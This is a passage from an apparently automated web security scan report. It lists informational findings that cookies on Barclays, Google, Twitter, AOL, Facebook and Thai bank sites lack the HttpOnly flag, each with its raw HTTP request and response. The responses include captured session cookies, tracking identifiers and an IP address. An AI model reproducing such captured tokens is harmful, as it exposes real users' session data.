Set-Cookie: TCID=0007af91-b6ee-955e-a561-8bbc00000043;path=/;domain=tc.barclays.co.uk;expires=Fri, 03-May-2013 10:22:49 GMT;
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 14:22:49 GMT;path=/

tc_create_content("P_Home_Main","P_Home_Main_PHM3_002",'<div><div class="lt"><div class="m-cont"><ul class="columns"><li class="column first"><h2><a title="Bank" style="color:#003366" onload="dcsMulti
...[SNIP]...

16.150. http://tc.barclays.co.uk/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?siteID=484&ts=1304436169225&ccID=P_Home_Main&ccID=P_Home_Row2_Left&ccID=P_Home_Row2_Right&ccID=P_Home_Col2&ccID=P_Home_Col3&ccID=P_Home_Col4&displayed=P_Home_Main_PHM4_070510&displayed=P_Home_Main_PHM13&displayed=P_Home_Main_PHM3_002&displayed=P_Home_Main_PHM7&displayed=P_Home_Row2_Left_PHRL1&displayed=P_Home_Row2_Right_PHRR3_v2_220311&displayed=P_Home_Main_PHM14&displayed=P_Home_Main_bcard_preapp&displayed=P_Home_Main_PHM48_070510&displayed=P_Home_Main_PHM50&displayed=P_Home_Main_PHM28_002&displayed=P_Home_Main_hp_col3_fixed_bond_240610&displayed=P_Home_Main_hp_col3_ISA_sav_240610&displayed=P_Home_Main_hp_col3_compare_sav_240610&displayed=P_Home_Main_PHM40&displayed=P_Home_Main_PHM44&displayed=P_Home_Main_PHM52&displayed=P_Home_Main_PHM42&location=http%3A%2F%2Fwww.barclays.co.uk%2FPersonalBanking%2FP1242557947640&tagv=5.3&tz=-300&r=empty&title=Barclays%20Personal%20Banking%20%7C%20ISAs%20%7C%20Barclays%20latest%20ISA%20rates%20-%20Barclays&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/PersonalBanking/P1242557947640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727; mbox=check#true#1304436224|session#1304436163124-351101#1304438024; TCID=0007af91-b6eb-2752-a537-8bbc00000043

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Date: Tue, 03 May 2011 10:22:51 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 03 May 2011 10:22:51 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 14:22:51 GMT;path=/

GIF89a.............!.......,............Q.;

16.151. http://translate.google.com/translate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:27:39 GMT
Expires: Tue, 03 May 2011 13:27:39 GMT
Cache-Control: private, max-age=86400
Location: http://translate.google.com/?hl=en
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=3330647f26744aa8:TM=1304429259:LM=1304429259:S=9wsa5oHcPuKVLX4W; expires=Thu, 02-May-2013 13:27:39 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
Content-Length: 0
X-XSS-Protection: 1; mode=block
Connection: close


16.152. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:26 GMT
Expires: Tue, 03 May 2011 13:27:26 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=71e2231686a4df92:TM=1304429246:LM=1304429246:S=UZVNqCuXSydjzUQK; expires=Thu, 02-May-2013 13:27:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

16.153. http://twitter.com/KBank_Live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /KBank_Live

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /KBank_Live HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429270-36774-61300
ETag: "9236e9ba3a0e891747be7255c635d244"
Last-Modified: Tue, 03 May 2011 13:27:50 GMT
X-Runtime: 0.00769
Content-Type: text/html; charset=utf-8
Content-Length: 53135
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429270340580; path=/; expires=Tue, 10-May-11 13:27:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927034781083; path=/; expires=Thu, 02 Jun 2011 13:27:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEwVC7YvAToHaWQiJTExMWU1MmMyYTgzNDNl%250AZjQyZmZhNGQxNDI3NjdjN2E0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--96123277011b42aa09089579184a6267a5490ead; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

16.154. http://twitter.com/ktb_care  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ktb_care

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ktb_care HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429269-53062-58419
ETag: "cbafa3883481612c4be62e572b1b077f"
Last-Modified: Tue, 03 May 2011 13:27:49 GMT
X-Runtime: 0.00689
Content-Type: text/html; charset=utf-8
Content-Length: 51047
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429269377500; path=/; expires=Tue, 10-May-11 13:27:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442926938325767; path=/; expires=Thu, 02 Jun 2011 13:27:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIkRC7YvAToHaWQiJWUzODUxZmM5N2FkMGYy%250ANWU2OTc4YmFmZmUwYzAwZjMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e6495d6a809198515566fe70a30332990466c813; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

16.155. http://twitter.com/scb_thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /scb_thailand

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scb_thailand HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429274-73578-48757
ETag: "93bfce0d2f5b4a39cb77e73211eaca85"
Last-Modified: Tue, 03 May 2011 13:27:54 GMT
X-Runtime: 0.00777
Content-Type: text/html; charset=utf-8
Content-Length: 52433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429274280425; path=/; expires=Tue, 10-May-11 13:27:54 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927428828772; path=/; expires=Thu, 02 Jun 2011 13:27:54 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLEkC7YvAToHaWQiJTEzY2I3OGVjNDZiNWM0%250AZGQ4NmVhNzFjZDY3ZGU4MDcxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b99283e2490d1e5e9ee960699bef94c5d581e3f7; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

16.156. http://video.google.com/videoplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /videoplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videoplay HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:28:07 GMT
Expires: Tue, 03 May 2011 13:28:07 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=47ea04eb3a7be0ea:TM=1304429287:LM=1304429287:S=HUtDMBVo-KZ106-O; expires=Thu, 02-May-2013 13:28:07 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close


<meta content="text/html; charset=UTF-8" http-equiv=Content-type>
<title>Google Videos Error</title>
<link href=/s/WSW5fPU0QIE/css/new_search_c.css rel=stylesheet>
<body>
<div style=margin-bottom:1em
...[SNIP]...

16.157. http://webmail.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.aol.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?offerId=aimmail-en-us HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3aff525dd1-7796-4faa-81d5-73c5a559e271&offerId=aimmail-en-us&seamless=novl
Server: Microsoft-IIS/7.0
Set-Cookie: Context=ver:3&sid:ff525dd1-7796-4faa-81d5-73c5a559e271&rt:STANDARD&ckd:.mail.aol.com&ckp:%2f&ha:qVnjU%2fo81Sw33UdC1DRic9FQOtw%3d&; domain=.mail.aol.com; path=/
P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:29:06 GMT
Content-Length: 456

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&amp;lang=en&amp;locale=us&amp;authLe
...[SNIP]...

16.158. http://www.barclays.com/privacy/com_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclays.com
Path:   /privacy/com_privacy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/com_privacy.html HTTP/1.1
Host: www.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454115176:ss=1304454046661

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:00 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304418120556141; path=/; expires=Wed, 27-Apr-33 10:22:00 GMT
Cache-Control: max-age=3600, must-revalidate
Content-Length: 5622
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

16.159. https://www.bizpayment.ktb.co.th/epayview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bizpayment.ktb.co.th
Path:   /epayview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /epayview HTTP/1.1
Host: www.bizpayment.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 12:53:30 GMT
Content-type: text/html
Location: https://www.bizpayment.ktb.co.th/epayview/
Connection: close
Set-Cookie: BIGipServerwww.bizpayment.ktb.co.th_ext=2925265162.47873.0000; path=/

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.bizpayment.ktb.co.th/e
...[SNIP]...

16.160. http://www.facebook.com/pages/KTB-Care/178373518915  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/KTB-Care/178373518915

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/KTB-Care/178373518915 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=z8-YA; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.171.104
Connection: close
Date: Tue, 03 May 2011 13:34:01 GMT
Content-Length: 239760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

16.161. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Tue, 03 May 2011 13:29:14 GMT
Expires: Tue, 03 May 2011 13:29:14 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

16.162. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:TmWaTfgWKfL150HA_TIl_THIIojbAg:DlLS6wTurRAvdZuM;Path=/accounts;Expires=Thu, 02-May-2013 13:35:40 GMT;Secure;HttpOnly
Set-Cookie: GALX=DVEOfIYoscA;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Tue, 03 May 2011 13:35:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10951
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

16.163. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:3xRNw51itG1YLFtl57J79ZLZ2oGmkQ:CweGJnEhEGG2esDX;Path=/accounts;Expires=Thu, 02-May-2013 13:35:35 GMT;Secure;HttpOnly
Set-Cookie: GALX=tN93GGEDnMc;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Tue, 03 May 2011 13:35:35 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10953
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

16.164. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=BPGwCtwPATcL8BIqu6AagiekUgYq86gHhq6mbGcCNtwGAr5cBEAMYAyDMncwDKAo4AFCg7Mrh_f____8BYMnug4jwo-wSoAGdzprsA7IBFmZvcm1sZXNzbmV0d29ya2luZy5jb226AQJqc8gBAdoBHmh0dHA6Ly9mb3JtbGVzc25ldHdvcmtpbmcuY29tL4ACAcgC8ZuGF6gDAegDZegDO-gDjAjoA7cC9QNAAADE&num=3&client=ca-dp-sedo-03_xml&val=ChAwYzYwYmQwNzMzMDAwMDk3ENW_yuoEGgirmWWdIWYI4iABKAE&sig=AGiWqtw3DLJbQ-Vi8BwGcksdwdaPH75Ogw&adurl=http://nerdbots.com/services/wireless-networking.html HTTP/1.1
Host: www.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CukBQlBHd0N0d1BBVGNMOEJJcXU2QWFnaWVrVWdZcTg2Z0hocTZtYkdjQ050d0dBcjVjQkVBTVlBeURNbmN3REtBbzRBRkNnN01yaF9mX19fXzhCWU1udWc0andvLXdTb0FHZHpwcnNBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDRBQ0FjZ0M4WnVHRjZnREFlZ0RaZWdETy1nRGpBam9BN2NDOVFOQUFBREUSEwi9kMrM8suoAhWBTOUKHahwT6kYASCau73a8ZeGiS9IAQ; expires=Thu, 02-Jun-2011 13:31:49 GMT; path=/pagead/conversion/1032234781/
Cache-Control: private
Location: http://nerdbots.com/services/wireless-networking.html?gclid=CL2Qyszyy6gCFYFM5QodqHBPqQ
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:31:49 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


16.165. http://www.googleadservices.com/pagead/conversion/1005090170/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1005090170/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1005090170/?random=1304447520942&cv=6&fst=1304447520942&num=1&fmt=3&value=0&label=4QdQCNavnwIQ-uqh3wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=5&u_nmime=39&ref=http%3A//www.sedoparking.com/search/registrar.php%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking.com&url=http%3A//www2.itt-tech.edu/it/d/%3Fcode%3D12268064030%7Cnetworking%2520security HTTP/1.1
Host: www.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.itt-tech.edu/it/d/?code=12268064030|networking%20security
Cookie: Conversion=CuUBQlR0bXZ0d1BBVGNMOEJJcXU2QWFnaWVrVXpvN29wQUtPNHRPSExzQ050d0hncWJnQkVBVVlCU0RNbmN3REtBbzRBRkRPb2ZqNS12X19fXzhCWU1udWc0andvLXdTb0FINjZxSGZBN0lCRm1admNtMXNaWE56Ym1WMGQyOXlhMmx1Wnk1amIyMjZBUUpxYzhnQkFkb0JIbWgwZEhBNkx5OW1iM0p0YkdWemMyNWxkSGR2Y210cGJtY3VZMjl0TDhnQ25zcXVHNmdEQWVnRFplZ0RPLWdEakFqb0E3Y0M5UU5BQUFERRITCMfAss7yy6gCFeVn5QodWm462BgBIMjivIfTitLTwQFIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Tue, 03 May 2011 13:43:31 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
